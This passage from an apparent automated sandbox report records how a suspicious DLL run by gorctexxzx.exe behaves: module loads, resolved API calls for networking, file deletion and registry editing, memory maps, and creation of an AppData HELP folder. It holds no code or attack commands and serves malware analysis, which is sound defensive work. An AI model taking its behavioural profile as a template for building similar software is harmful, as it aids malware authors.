| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 100, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97048 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #44: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #44 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllCanUnloadNow /fn_args="127.0.0.1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc8c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x002d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00570fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0064ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0082ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd5fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97141 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #45: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #45 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllGetClassObject /fn_args="127.0.0.1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc98 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C9C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x004d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x010dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000010e0000 | 0x010e0000 | 0x011cffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0132ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
